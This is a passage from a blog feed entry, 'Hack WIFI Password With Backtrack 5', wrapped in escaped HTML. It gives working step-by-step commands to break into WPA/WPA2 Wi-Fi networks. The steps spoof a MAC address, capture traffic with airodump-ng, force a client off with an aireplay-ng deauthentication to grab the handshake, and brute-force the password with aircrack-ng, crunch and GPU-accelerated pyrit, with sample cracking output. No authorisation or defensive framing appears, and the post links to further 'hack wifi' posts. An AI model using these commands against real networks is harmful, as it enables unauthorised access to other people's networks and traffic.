-m 00:11:22:33:44:55 mon0&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;ifconfig
mon0 up&lt;/code&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;airodump-ng mon0&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
Then, press &quot;&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;Ctrl+c&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&quot; to break the program.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;airodump-ng -c 3 -w wpacrack --bssid
ff:ff:ff:ff:ff:ff --ivs mon0&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
*where -c is the channel&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; -w is the file to
be written&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; --bssid is the BSSID&lt;br /&gt;
&lt;br /&gt;
This terminal is keeping running.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 6 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
open another terminal.&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c
99:88:77:66:55:44 mon0&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
*where -a is the BSSID&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; -c is the client
MAC address (STATION)&lt;br /&gt;
&lt;br /&gt;
Wait for the handshake.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 7 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Use the John the Ripper as word list to crack the WPA/WP2 password.&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;aircrack-ng -w
/pentest/passwords/john/password.lst wpacrack-01.ivs&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you do not want to use John the Ripper as word list, you can use Crunch.&lt;br /&gt;
&lt;br /&gt;
Go to the official site of crunch.&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;&lt;a href=&quot;http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/&quot;&gt;http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/&lt;/a&gt;&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
Download crunch 3.0 (the current version at the time of this writing).&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;&lt;a href=&quot;http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download&quot;&gt;http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download&lt;/a&gt;&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;tar -xvzf crunch-3.0.tgz&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Courier New&amp;quot;; font-size: 10pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;code&gt;cd
crunch-3.0&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;make&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;make
install&lt;/code&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;/pentest/passwords/crunch/crunch 8 16 -f
/pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv |
aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt; &lt;br /&gt;
&lt;br /&gt;
*where &lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;8 16&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt; is
the length of the password, i.e. from 8 characters to 16 characters.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;(B) nVidia Display Card with CUDA&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you have nVidia card that with CUDA, you can use pyrit to crack the password
with crunch.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step a :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;airmon-ng&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
The result will be something like :&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;Interface&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Chipset&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Driver&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Courier New&amp;quot;; font-size: 10pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;code&gt;wlan0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Intel
5100&amp;nbsp;&amp;nbsp;&amp;nbsp;iwlagn - [phy0]&lt;/code&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step b :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;airmon-ng start wlan0&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step c (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Change the mac address of the mon0 interface.&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;ifconfig mon0 down&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Courier New&amp;quot;; font-size: 10pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;code&gt;macchanger
-m 00:11:22:33:44:55 mon0&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;ifconfig
mon0 up&lt;/code&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step d :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;airodump-ng mon0&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
Then, press &quot;&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;Ctrl+c&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&quot; to break the program.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step e :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;airodump-ng -c 3 -w wpacrack --bssid
ff:ff:ff:ff:ff:ff mon0&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step f :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
open another terminal.&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c
99:88:77:66:55:44 mon0&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
*where -a is the BSSID&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; -c is the client
MAC address (STATION)&lt;br /&gt;
&lt;br /&gt;
Wait for the handshake.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step g :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If the following programs are not yet installed, please do it.&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;apt-get install libghc6-zlib-dev libssl-dev
python-dev libpcap-dev python-scapy&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step h :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Go to the official site of crunch.&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;&lt;a href=&quot;http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/&quot;&gt;http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/&lt;/a&gt;&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
Download &lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;crunch 3.0&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt; (the current version at the time of this
writing).&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;tar -xvzf crunch-3.0.tgz&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Courier New&amp;quot;; font-size: 10pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;code&gt;cd
crunch-3.0&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;make&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;make
install&lt;/code&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step i :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Go to the official site of pyrit.&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;&lt;a href=&quot;http://code.google.com/p/pyrit/downloads/list&quot;&gt;http://code.google.com/p/pyrit/downloads/list&lt;/a&gt;&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
Download &lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;pyrit&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt; and &lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;cpyrit-cuda&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt; (the current version is 0.4.0 at the time of
this writing).&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;tar -xzvf pyrit-0.4.0.tar.gz&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Courier New&amp;quot;; font-size: 10pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;code&gt;cd
pyrit-0.4.0&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;python
setup.py build&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;sudo
python setup.py install&lt;/code&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;tar -xzvf cpyrit-cuda-0.4.0.tar.gz&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Courier New&amp;quot;; font-size: 10pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;code&gt;cd
cpyrit-cuda-0.4.0&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;python
setup.py build&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;sudo
python setup.py install&lt;/code&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step j :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst
mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b
ff:ff:ff:ff:ff:ff -i - attack_passthrough&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
*where &lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;8 16&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt; is
the length of the password, i.e. from 8 characters to 16 characters.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step k (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you encounter error when reading the &lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;wpacrack-01.cap&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;,
you should do the following step.&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;pyrit -r wpacrack-01.cap -o new.cap stripLive&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;/pentest/passwords/crunch/crunch 8 16 -f
/pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit
--all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
*where &lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;8 16&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt; is
the length of the password, i.e. from 8 characters to 16 characters.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step l :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Then, you will see something similar to the following.&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg
&lt;a href=&quot;http://pyrit.googlecode.com/&quot;&gt;http://pyrit.googlecode.com&lt;/a&gt;&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Courier New&amp;quot;; font-size: 10pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;code&gt;This
code is distributed under the GNU General Public License v3+&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Parsing
file &#39;new.cap&#39; (1/1)...&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;Parsed
71 packets (71 802.11-packets), got 55 AP(s)&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Tried
17960898 PMKs so far; 17504 PMKs per second.&lt;/code&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Remarks :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is
about 17,000 passwords per second.&lt;br /&gt;
&lt;br /&gt;
To test if your wireless card (either USB or PCI-e) can do the injection or not
:&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;airodump-ng mon0&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
Open another terminal.&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;aireplay-ng -9 mon0&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;Make
sure pyrit workable on your system :&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;pyrit list_cores&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
That&#39;s all! See you.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
If above methods can&#39;t works for you then you can also try these&lt;br /&gt;
&lt;a class=&quot;GHUY-LPOB&quot; href=&quot;http://hackerx-malik.blogspot.com/2012/11/hack-wifi-password-in-windows.html&quot; style=&quot;background-color: white; border: 0px; color: #1155cc; cursor: pointer; font-family: Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 10px 0px 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;Hack Wifi Password In Windows&lt;/a&gt;&lt;br /&gt;
&lt;a class=&quot;GHUY-LPOB&quot; href=&quot;http://hackerx-malik.blogspot.com/2012/11/wifi-password-hack-how-to-hack-wifi.html&quot; style=&quot;background-color: white; border: 0px; color: #1155cc; cursor: pointer; font-family: Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 10px 0px 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;Wifi Password Hack&lt;/a&gt;&lt;br /&gt;
&lt;a class=&quot;GHUY-LPOB&quot; href=&quot;http://hackerx-malik.blogspot.com/2012/10/how-to-hack-into-computers-through-wifi.html&quot; style=&quot;background-color: white; border: 0px; color: #1155cc; font-family: Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 10px 0px 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;How To Hack Into Computers Through WiFi&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/5561937942847341051/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2012/11/hack-wifi-password-with-backtrack-5.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/5561937942847341051'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/5561937942847341051'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2012/11/hack-wifi-password-with-backtrack-5.html' title='Hack WIFI Password With Backtrack 5 '/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>